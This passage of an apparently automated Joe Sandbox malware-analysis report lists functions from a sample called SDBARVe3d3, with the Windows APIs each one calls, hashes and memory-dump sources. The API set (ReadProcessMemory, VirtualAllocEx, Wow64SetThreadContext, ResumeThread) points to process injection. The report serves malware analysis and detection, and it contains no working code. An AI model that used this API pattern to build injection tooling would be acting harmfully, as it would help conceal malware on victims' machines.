                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 692 7294770-7294805 ReadProcessMemory 696 729480e-729483e 692->696 697 7294807-729480d 692->697 697->696
                                                                                                                                    APIs
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072947F8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 1726664587-2367252532
                                                                                                                                    • Opcode ID: 8f3b3cdc3f9f25438ca9e7ee71ab6e3c2e1a3ccf74f86880fa56b28834264764
                                                                                                                                    • Instruction ID: 630613cf45b84287da9539425d37375ea8f2cca38d705fa16e26d31dfbc4fac2
                                                                                                                                    • Opcode Fuzzy Hash: 8f3b3cdc3f9f25438ca9e7ee71ab6e3c2e1a3ccf74f86880fa56b28834264764
                                                                                                                                    • Instruction Fuzzy Hash: 142148B18003599FCB10DFAAC885AEEFBF5FF48320F10882AE558A7251C734A555CBA5
                                                                                                                                    Function 072944E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 681 72944e8-729453b 684 729454b-729457b Wow64SetThreadContext 681->684 685 729453d-7294549 681->685 687 729457d-7294583 684->687 688 7294584-72945b4 684->688 685->684 687->688
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0729456E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 983334009-2367252532
                                                                                                                                    • Opcode ID: 2bf9d21e27e0837d33f45b6706d04ed59a12fc9352a27b9df1066fae00b303f1
                                                                                                                                    • Instruction ID: 9efe53f09c1f06bf8f6b61fa8c83a01045e2f224a1ca417c684e31ec9799e167
                                                                                                                                    • Opcode Fuzzy Hash: 2bf9d21e27e0837d33f45b6706d04ed59a12fc9352a27b9df1066fae00b303f1
                                                                                                                                    • Instruction Fuzzy Hash: 3A2159B1D002499FDB10DFAAC485BEEBBF4EF48324F14842AD459A7241DB789985CFA4
                                                                                                                                    Function 0516D94A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0516D9D7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 3793708945-2367252532
                                                                                                                                    • Opcode ID: e95ed9758c766ea5d73e94ccd7fdb607d47a85c53cb1aa4451982b091f70a6a5
                                                                                                                                    • Instruction ID: 2321d45e6112b1dacbf14c6ed29caebc3af65f1a1eec1c75b98cecf5f969d968
                                                                                                                                    • Opcode Fuzzy Hash: e95ed9758c766ea5d73e94ccd7fdb607d47a85c53cb1aa4451982b091f70a6a5
                                                                                                                                    • Instruction Fuzzy Hash: 2121E4B5900218AFDB10CF9AD984ADEFFF4FB48320F14841AE955A7310C379A954CFA5
                                                                                                                                    Function 07294778 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 072947F8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 1726664587-2367252532
                                                                                                                                    • Opcode ID: 3e7b7c0db79c3101b02a89bdf105f4e53a86fe919c05a1df8b7878d078bd3b49
                                                                                                                                    • Instruction ID: 6cdf6460d8955da0e14e7b54aae70c09bf35124d42fc0dafcb45bb5fd89d8a47
                                                                                                                                    • Opcode Fuzzy Hash: 3e7b7c0db79c3101b02a89bdf105f4e53a86fe919c05a1df8b7878d078bd3b49
                                                                                                                                    • Instruction Fuzzy Hash: 4C2139B18003599FDB10DFAAC840AEEFBF5FF48310F108429E559A7250C7349545CBA4
                                                                                                                                    Function 072944F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0729456E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 983334009-2367252532
                                                                                                                                    • Opcode ID: 70b3d9a0359a019b7cf0ea1345257a0f020bc444185ffbf2a786b6050fe13ba3
                                                                                                                                    • Instruction ID: 986034e1ecb390bf3cb05440ee297d9c5b5858e1d275aeb427e8c7920ecb8406
                                                                                                                                    • Opcode Fuzzy Hash: 70b3d9a0359a019b7cf0ea1345257a0f020bc444185ffbf2a786b6050fe13ba3
                                                                                                                                    • Instruction Fuzzy Hash: 0A2138B19002099FDB10DFAAC485BEEBBF4EF48324F148429D859A7240DB789945CFA4
                                                                                                                                    Function 0516D950 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0516D9D7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DuplicateHandle
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 3793708945-2367252532
                                                                                                                                    • Opcode ID: 53e5cf73fb618dba75f8e0cee1470b43d9d9410682370229881ff4f1126af266
                                                                                                                                    • Instruction ID: 65e59b7e1a4eb97f1388454999d99d455d5e9bb3ab2f4d8b4388cb32a9fc8220
                                                                                                                                    • Opcode Fuzzy Hash: 53e5cf73fb618dba75f8e0cee1470b43d9d9410682370229881ff4f1126af266
                                                                                                                                    • Instruction Fuzzy Hash: 7B21E4B5900208AFDB10CF9AD584ADEFBF4FB48310F14841AE955A3310C374A954CFA4
                                                                                                                                    Function 072945C3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07294636
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 4275171209-2367252532
                                                                                                                                    • Opcode ID: d916281f90b7209aa619440356cd4be36403949ec2f0944f04cc2684d861ade3
                                                                                                                                    • Instruction ID: bda212c0bc6b1c8479fc07bd0bffcbb5292911abae7459db5a0be5936a8ce958
                                                                                                                                    • Opcode Fuzzy Hash: d916281f90b7209aa619440356cd4be36403949ec2f0944f04cc2684d861ade3
                                                                                                                                    • Instruction Fuzzy Hash: 5D1159B18002499FCB10DFAAC845ADFBFF5EB48320F148819E559A7250CB359545CFA4
                                                                                                                                    Function 072945C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07294636
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 4275171209-2367252532
                                                                                                                                    • Opcode ID: 5ab623798df20011c2a523f52b994dfbb0b2d27421c6e6ca0833769fe96f8d24
                                                                                                                                    • Instruction ID: 78497b97d6796c8a298250f04589581b1d111b9b150458e4469d99d3c0441086
                                                                                                                                    • Opcode Fuzzy Hash: 5ab623798df20011c2a523f52b994dfbb0b2d27421c6e6ca0833769fe96f8d24
                                                                                                                                    • Instruction Fuzzy Hash: C81156B18002499FCB10DFAAC844ADFBFF5EB88320F148829E559A7250C735A545CFA4
                                                                                                                                    Function 07294438 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 947044025-2367252532
                                                                                                                                    • Opcode ID: c436697a09d53a394419f2cc221b9b46d1e7f3f102d92a0b6a1d21b1e56d68ce
                                                                                                                                    • Instruction ID: e058a97a9f3b0cb6dcbf21635c6652c10124defb916a5a9c4b406eb9055a0381
                                                                                                                                    • Opcode Fuzzy Hash: c436697a09d53a394419f2cc221b9b46d1e7f3f102d92a0b6a1d21b1e56d68ce
                                                                                                                                    • Instruction Fuzzy Hash: 4F115BB19002498FDB20DFAAC4457DEFBF4EB88324F248829D459A7250CA356545CBA5
                                                                                                                                    Function 07294440 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 947044025-2367252532
                                                                                                                                    • Opcode ID: 99b635641f4e438a4aa452fd9ed4ee8b14ad5c2e0be47958f537e65519880fe6
                                                                                                                                    • Instruction ID: 7053732d941b423b1d1f29c26f7fece5c043c919a8a754b1c394c7bf49a58571
                                                                                                                                    • Opcode Fuzzy Hash: 99b635641f4e438a4aa452fd9ed4ee8b14ad5c2e0be47958f537e65519880fe6
                                                                                                                                    • Instruction Fuzzy Hash: EF113AB19002498FDB20DFAAC4457DFFBF4EF88324F248829D459A7250CB75A545CFA5
                                                                                                                                    Function 0516B258 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0516B2BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1694759601.0000000005160000.00000040.00000800.00020000.00000000.sdmp, Offset: 05160000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_5160000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleModule
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 4139908857-2367252532
                                                                                                                                    • Opcode ID: eefe0a41c8c1efd2f2e726708ebb8612b9206b9b35aea56d2a47eb38bd3e1797
                                                                                                                                    • Instruction ID: 7b530147eb2f2019f3070cf5bc234752b39e9e1cfc7dae019a338d95aa8ad79e
                                                                                                                                    • Opcode Fuzzy Hash: eefe0a41c8c1efd2f2e726708ebb8612b9206b9b35aea56d2a47eb38bd3e1797
                                                                                                                                    • Instruction Fuzzy Hash: EC11EDB6C042498FDB10CF9AC444ADEFBF4EF88324F10842AD869A7610C379A545CFA5
                                                                                                                                    Function 072928DC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07296CBD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 410705778-2367252532
                                                                                                                                    • Opcode ID: 86f7e3b6d07fb0f76835b7b06da95b2d9dd29d880effd6c5795100916bf776d6
                                                                                                                                    • Instruction ID: ba4da006b63542c7d87b3608141347ed80bb31b47dcab29af3408376345fd0fd
                                                                                                                                    • Opcode Fuzzy Hash: 86f7e3b6d07fb0f76835b7b06da95b2d9dd29d880effd6c5795100916bf776d6
                                                                                                                                    • Instruction Fuzzy Hash: FF11F2B59003499FDB10DF9AD988BDEBBF8EB48320F148819E558A7300C375A944CFA5
                                                                                                                                    Function 07296C59 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 07296CBD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost
                                                                                                                                    • String ID: <mQW
                                                                                                                                    • API String ID: 410705778-2367252532
                                                                                                                                    • Opcode ID: d2d53ba79857c177ab263bfbf70196c629b90640baa7a82c8d8f60da4224226b
                                                                                                                                    • Instruction ID: c1ae8339e70093db3dfc02cf0df2e7092054888693d42a12e2966387cb319605
                                                                                                                                    • Opcode Fuzzy Hash: d2d53ba79857c177ab263bfbf70196c629b90640baa7a82c8d8f60da4224226b
                                                                                                                                    • Instruction Fuzzy Hash: 7A11F2B5800349DFDB10DF9AC889BDEBBF8EB48320F14881AE558A7300C375A544CFA5
                                                                                                                                    Function 00E9D3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692282204.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_e9d000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cd7ebf2db242a1af68d09b6d45b56c406367ce82a8ad80c443635432cdbf1319
                                                                                                                                    • Instruction ID: ec4822a67da35c6fa5690d51f3a52dd9a923d90664bcd0b42621036c06f6ed53
                                                                                                                                    • Opcode Fuzzy Hash: cd7ebf2db242a1af68d09b6d45b56c406367ce82a8ad80c443635432cdbf1319
                                                                                                                                    • Instruction Fuzzy Hash: BD212871508204DFDF05DF14DDC0B2ABF65FB94324F20C169D9095B256C336E856C6A2
                                                                                                                                    Function 010BD01C Relevance: .1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692686203.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10bd000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1f31862b40ad6323c0c4160248301e75ddc4c1b99b32e41fe54c8394091968ff
                                                                                                                                    • Instruction ID: d19611b9d146c5d2974e4616c879b4fedd6c6e7ce0d84e18114e766d8b125fff
                                                                                                                                    • Opcode Fuzzy Hash: 1f31862b40ad6323c0c4160248301e75ddc4c1b99b32e41fe54c8394091968ff
                                                                                                                                    • Instruction Fuzzy Hash: 70212271614200DFCB15DF98D9C4B6AFFA5EB88318F20C5ADE98A4B256C33AD447CB61
                                                                                                                                    Function 010BD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692686203.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10bd000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 45924cdc14c5beee3d9ef0b7361b5fa1e9b58a8b7b6d502d5bd28ce64be6339f
                                                                                                                                    • Instruction ID: 800924b0d7ab34c0ced07d83aeeaeea3825d5a0a2437e36d77bc8d9471d0ff5a
                                                                                                                                    • Opcode Fuzzy Hash: 45924cdc14c5beee3d9ef0b7361b5fa1e9b58a8b7b6d502d5bd28ce64be6339f
                                                                                                                                    • Instruction Fuzzy Hash: 2B212971504240EFDB05DF98D5C0B6AFFA5FB94328F20C5ADD9894B256C336D846CB61
                                                                                                                                    Function 010BD006 Relevance: .1, Instructions: 63COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692686203.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10bd000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6ec627737c72ebf0be575fd3678bb0d01979ac911e8fce1a5ebf27f0bf695c29
                                                                                                                                    • Instruction ID: dee948e5d5e0957d1fc3baed9601f58d4d2648c21173e58b71d4bbb22aa177f9
                                                                                                                                    • Opcode Fuzzy Hash: 6ec627737c72ebf0be575fd3678bb0d01979ac911e8fce1a5ebf27f0bf695c29
                                                                                                                                    • Instruction Fuzzy Hash: 772153755083809FDB12CF54D9D4711BFB1EB46214F28C5DAD8898F2A7C33A9856CB62
                                                                                                                                    Function 00E9D3D3 Relevance: .1, Instructions: 56COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692282204.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_e9d000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                    • Instruction ID: dc4809fb5d0942b7945b0249c5f9bf69af0d5c160a399ef89d253f91a1cd0b5f
                                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                    • Instruction Fuzzy Hash: F5110372404240DFCF12CF00D9C4B16BF71FB94328F24C2A9D8090B256C33AE85ACBA1
                                                                                                                                    Function 010BD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692686203.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10bd000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                    • Instruction ID: f788f36ded3ac9f4b2af8f4426584ea6d00ec9979e21914e9cd217da09d2a933
                                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                    • Instruction Fuzzy Hash: EC11BB75504280DFDB02CF54C5C4B55FFA1FB84228F24C6AAD8894B296C33AD80ACB61
                                                                                                                                    Function 00E9D759 Relevance: .0, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692282204.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_e9d000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2d3a92c9d804e542a797d2bb11443a68c9d49b924f31b98d1ec36493a4cd977c
                                                                                                                                    • Instruction ID: 220e425e71f4717733c8ae19173b471b63710af7b316b319f6c4b3835d6291ef
                                                                                                                                    • Opcode Fuzzy Hash: 2d3a92c9d804e542a797d2bb11443a68c9d49b924f31b98d1ec36493a4cd977c
                                                                                                                                    • Instruction Fuzzy Hash: F001DB7100C3509AEB104E66DDC4BA7FFE8EF51324F18C92BED095A286C779D840C6B1
                                                                                                                                    Function 00E9D758 Relevance: .0, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1692282204.0000000000E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E9D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_e9d000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a9da4525de8bdaca756bde1a1ba1a459d3d6ac34caac194af9bcb7c5a083ddd1
                                                                                                                                    • Instruction ID: 5545c3504d6a0e1ba456b5f4aaae8a42811ab49a0c4981abf80ff1e84f27c218
                                                                                                                                    • Opcode Fuzzy Hash: a9da4525de8bdaca756bde1a1ba1a459d3d6ac34caac194af9bcb7c5a083ddd1
                                                                                                                                    • Instruction Fuzzy Hash: E3F06271408354AEEB108E16DC84B62FFA8EF51729F18C45AED485F286C2799844CAB1

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 07299748 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                    • Opcode ID: af22140569e0676d883ab2323e8afdee08197e413b29378cdf875f6406d4a8a9
                                                                                                                                    • Instruction ID: b055fc635602bd707021e48ed3dc1fcd6fd749cc4c67fd4cddb05b0412dbdbd3
                                                                                                                                    • Opcode Fuzzy Hash: af22140569e0676d883ab2323e8afdee08197e413b29378cdf875f6406d4a8a9
                                                                                                                                    • Instruction Fuzzy Hash: 39D1B5B4A10505CFDB18DF69C598AA9B7F1BF8D311F2980B8E449AB365DB31AD40CF60
                                                                                                                                    Function 072937E0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 53c489ac9fcb13ef6c833f8b7c2b361d5f84035c251d97a2126315d27e903c61
                                                                                                                                    • Instruction ID: 39ed5fb209b6c8355b78821612d41a712a1f3b44ee28fc2fc8d26a1da0975266
                                                                                                                                    • Opcode Fuzzy Hash: 53c489ac9fcb13ef6c833f8b7c2b361d5f84035c251d97a2126315d27e903c61
                                                                                                                                    • Instruction Fuzzy Hash: EAE1F8B4E101598FCB14DFA9C580AAEFBB6BF89304F249169D414AB356DB31AD42CF60
                                                                                                                                    Function 07293C18 Relevance: .3, Instructions: 312COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a09557792a6c5607ce47b12c71ba8ed9e9a0cc88f5a26e2dab2acbacbdfe24c5
                                                                                                                                    • Instruction ID: b0b8dec906cf117e7c091f5568cfeca9e6a121d6ce7119a19979f8afcdb57ad3
                                                                                                                                    • Opcode Fuzzy Hash: a09557792a6c5607ce47b12c71ba8ed9e9a0cc88f5a26e2dab2acbacbdfe24c5
                                                                                                                                    • Instruction Fuzzy Hash: 54E1FAB4E101598FCB14DFA9C5809AEFBB6FF89304F249169E414AB356DB31AD42CF60
                                                                                                                                    Function 07291CB0 Relevance: .3, Instructions: 312COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1695880861.0000000007290000.00000040.00000800.00020000.00000000.sdmp, Offset: 07290000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_7290000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 819b6feae9d3bc49dabe3210482b3853f213cc7168a07750b265d053291d2009
